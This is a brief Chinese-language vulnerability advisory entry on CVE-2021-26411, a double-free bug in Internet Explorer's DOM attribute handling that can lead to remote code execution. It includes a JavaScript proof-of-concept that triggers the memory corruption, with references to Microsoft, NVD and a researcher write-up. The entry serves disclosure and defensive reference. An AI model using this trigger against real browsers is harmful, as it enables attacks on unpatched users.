跳转至

Internet Explorer内存损坏漏洞(CVE-2021-26411)

Interne Explorer在处理DOM对象时,存在一处double free漏洞,攻击者可通过诱导用户点击恶意链接或文件来利用此漏洞,此漏洞可导致远程代码执行,从而使攻击者控制用户系统。该漏洞细节已公开,并检测到在野利用。

漏洞详情可以参考:https://iamelli0t.github.io/2021/03/12/CVE-2021-26411.html

PoC:

<script>
var elem = document.createElement('xxx'); 
var attr1 = document.createAttribute('yyy'); 
var attr2 = document.createAttribute('zzz'); 

var obj = {};
obj.valueOf = function() {
        elem.clearAttributes();
        return 0x1337;
};

attr1.nodeValue = obj;
attr2.nodeValue = 123;
elem.setAttributeNode(attr1);
elem.setAttributeNode(attr2);
elem.removeAttributeNode(attr1); 
</script>

ref:

  • https://msrc.microsoft.com/updat ... lity/CVE-2021-26411
  • https://nvd.nist.gov/vuln/detail/CVE-2021-26411
  • https://iamelli0t.github.io/2021/03/12/CVE-2021-26411.html